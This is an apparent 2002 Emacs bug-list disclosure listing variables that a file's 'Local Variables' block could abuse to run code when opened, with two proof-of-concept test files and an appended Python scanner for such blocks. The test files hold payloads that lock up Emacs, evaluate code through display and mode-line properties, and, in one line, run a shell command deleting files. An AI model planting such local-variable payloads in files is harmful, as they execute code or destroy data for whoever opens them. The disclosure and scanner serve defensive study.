From: Jonathan Yavner
Newsgroups: gmane.emacs.bugs
Subject: Security holes in risky-local-variable system
Date: Tue, 26 Mar 2002 16:45:52 GMT
Message-ID: <3CA0A5F7.DD46E3BF@comcast.net>
Original-Newsgroups: gnu.emacs.bug
List-Id: Bug reports for GNU Emacs, the Swiss army knife of text editors

Version: GNU Emacs 21.1.1 (i386-msvc-windows98.1998)

!!!This is intended as a white-hat post.  No flames, please!!!

These variables are risky and should have the risky-local-variable
attribute:
   auto-mode-alist
   minor-mode-overriding-map-alist
   overriding-local-map
Any of these could be used in the "Local Variables" area of a file in
order to create a Trojan horse; see test files below.

Another Trojan-horse method uses the frame parameter `buffer-predicate',
so any variable that defines frame parameters is risky:
   default-frame-alist
   initial-frame-alist
   pop-up-frame-alist
   special-display-buffer-names
   special-display-frame-alist

The font-lock system uses callback functions, so its variables are risky
if global-font-lock-mode is enabled.  Also, the font-lock initialization
will happily set any variable for you, even those with the
risky-local-variable property:
   font-lock-defaults
   font-lock-keywords
   font-lock-syntactic-keywords

Because display properties can contain forms to be evaluated later, any
variable containing text that might be inserted into a buffer is risky.
Examples:
   buffer-undo-list
   default-directory
   default-text-properties
I'm sure of these (see test files below), but there could be many others.
Perhaps what's needed is a variable "display-eval-enable", default nil,
with the risky-local-variable property?  Such a variable would close this
entire loophole, except in modes that really want it.

Because of the :eval keyword, any variable used for mode-line formatting
is also risky.  Examples:
   frame-title-format, global-mode-string, header-line-format,
   icon-title-format, input-method-alist, minor-mode-alist,
   mode-line-buffer-identification, mode-line-format,
   mode-line-frame-identification, mode-line-modified,
   mode-line-mule-info, mode-line-process, vc-mode
How about a new variable "mode-line-eval-enable", with the
risky-local-variable property, default '(mode-line-mode-name), which
would be a list of functions that :eval would accept, or t to accept
everything?

Test file #1:  (give it the filename "x", change "$" below to ":", save,
and reload)
...........snip here...................................................
For a moment's amusement, load this file and immediately type C-c r a s h
Maximize your enjoyment by not saving your other buffers first!
Other fun things to try:
   C-_
   C-x C-f x RET
   C-x k RET

;;; Local Variables$
;;; overriding-local-map: (keymap (3 . (lambda () (interactive) (while 1))))
;;; buffer-undo-list: (nil (#("Fun" 0 3 (display (height (progn (message "@buffer-undo-list") 2)))) . 1))
;;; default-directory: #("/tmp/" 0 5 (display (height (progn (message "@default-directory") 2))))
;;; mode-line-format: (:eval (progn (shell-command "rm /UNLIKELY/FILENAME*") "@mode-line-format"))
;;; End:
...........snip here...................................................

Test file #2:  (call it "x.el", enable global-font-lock first, change "$"
below to ":", save and reload)
...........snip here...................................................
Some fun things to try:
   C-a
   C-\
   C-x C-w x RET
   C-x 5 2
   C-x b RET

;;; Local Variables$
;;; auto-mode-alist: (("." . (lambda () (message "@auto-mode-alist"))))
;;; default-frame-alist: ((buffer-predicate . (lambda (x) (message "@default-frame-alist"))))
;;; font-lock-defaults: (((eval . (message "@font-lock-defaults#1"))) nil nil nil (lambda (&rest x) (message "@font-lock-defaults#2")) (load-path "@font-lock-defaults#3/"))
;;; mode: Outline-minor
;;; minor-mode-overriding-map-alist: ((outline-minor-mode keymap (1 . (lambda () (interactive) (error "@minor-mode-overriding-map-alist")))))
;;; default-text-properties: (display (height (progn (message "@default-text-properties") 0.5)))
;;; header-line-format: (:eval (message "@header-line-format"))
;;; input-method-alist: (("latin-1-prefix" "English" (lambda (x) (message "@input-method-alist")) "@" "Making trouble"))
;;; End:
..........snip here...................................................
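An added example, not part of the original post and not Emacs code: a small Python scanner that extracts a file's "Local Variables:" block the way Emacs delimits it (the text before the marker is a prefix and the text after it a suffix that every entry line must carry, up to a line whose body is "End:") and flags entries that are named as risky in the report above, that carry a name suffix of the kind Emacs itself treats as risky (the suffix list here is an approximation, not Emacs's own check), or whose values contain code-carrying shapes: lambda, progn, eval forms, :eval, and propertized strings with display properties. The variable set is copied from the post; the sample input is constructed, with a real ":" after the marker so Emacs would honour it.

```python
"""Flag Trojan-horse candidates in an Emacs "Local Variables:" block.

Added example, not from the original post.  The risky-variable set is copied
from the report; the name-suffix pattern is an assumption that approximates
Emacs's own check rather than reproducing it.
"""
import re
from typing import Dict, List, Tuple

# Variables the report names as risky (copied from the post).
REPORTED_RISKY = {
    "auto-mode-alist", "minor-mode-overriding-map-alist", "overriding-local-map",
    "default-frame-alist", "initial-frame-alist", "pop-up-frame-alist",
    "special-display-buffer-names", "special-display-frame-alist",
    "font-lock-defaults", "font-lock-keywords", "font-lock-syntactic-keywords",
    "buffer-undo-list", "default-directory", "default-text-properties",
    "frame-title-format", "global-mode-string", "header-line-format",
    "icon-title-format", "input-method-alist", "minor-mode-alist",
    "mode-line-buffer-identification", "mode-line-format",
    "mode-line-frame-identification", "mode-line-modified",
    "mode-line-mule-info", "mode-line-process", "vc-mode",
}

# Name suffixes treated as risky (assumption: an approximation of the
# suffixes Emacs checks, not a verbatim copy of its pattern).
RISKY_SUFFIX = re.compile(r"-(hooks?|functions?|forms?|program|command|predicate)$")

# Value shapes that smuggle code into a data variable: closures, :eval in
# mode-line constructs, progn/eval forms, and propertized strings whose
# `display' property is evaluated when the text is rendered.
CODE_PATTERNS = [
    (re.compile(r"\(\s*lambda\b"), "lambda"),
    (re.compile(r"\(\s*progn\b"), "progn"),
    (re.compile(r"\(\s*eval\b"), "eval form"),
    (re.compile(r":eval\b"), ":eval"),
    (re.compile(r'#\("'), "propertized string"),
    (re.compile(r"\(\s*display\b"), "display property"),
]

MARKER = "Local Variables:"


def parse_local_variables(text: str) -> List[Tuple[str, str]]:
    """Return (name, value) pairs from the last Local Variables block.

    Text before the marker is the prefix and text after it the suffix; every
    entry line must start and end with them.  The block ends at a line whose
    body is "End:".  Values are returned as raw Lisp text, not evaluated.
    """
    lines = text.splitlines()
    starts = [i for i, line in enumerate(lines) if MARKER in line]
    if not starts:
        return []
    head = lines[starts[-1]]
    idx = head.index(MARKER)
    prefix, suffix = head[:idx], head[idx + len(MARKER):]
    entries: List[Tuple[str, str]] = []
    for line in lines[starts[-1] + 1:]:
        if not (line.startswith(prefix) and line.endswith(suffix)):
            continue
        body = line[len(prefix):len(line) - len(suffix)].strip()
        if body == "End:":
            break
        name, sep, value = body.partition(":")
        if sep:
            entries.append((name.strip(), value.strip()))
    return entries


def audit_local_variables(text: str) -> Dict[str, List[str]]:
    """Map each suspicious variable name to the reasons it was flagged."""
    findings: Dict[str, List[str]] = {}
    for name, value in parse_local_variables(text):
        reasons = []
        if name in REPORTED_RISKY:
            reasons.append("named as risky in the report")
        if RISKY_SUFFIX.search(name):
            reasons.append("risky name suffix")
        for pattern, label in CODE_PATTERNS:
            if pattern.search(value):
                reasons.append(f"value contains {label}")
        if reasons:
            findings[name] = reasons
    return findings


# Constructed sample: a benign fill-column beside two entries modelled on
# the report's test file #1 and one name-suffix hit.
SAMPLE = """\
some ordinary file content
;;; Local Variables:
;;; fill-column: 70
;;; mode-line-format: (:eval (progn (shell-command "echo pwned") "@mode-line-format"))
;;; default-directory: #("/tmp/" 0 5 (display (height (progn (message "hi") 2))))
;;; compile-command: "make"
;;; End:
"""

if __name__ == "__main__":
    for var, why in audit_local_variables(SAMPLE).items():
        print(f"{var}: {', '.join(why)}")
```

The value patterns are heuristics: a value can reference a named function instead of a lambda, so a clean scan is not proof of safety, while any hit is a reason to read the block before letting Emacs apply it. Run it over files received from untrusted sources before opening them in an editor that honours local variables.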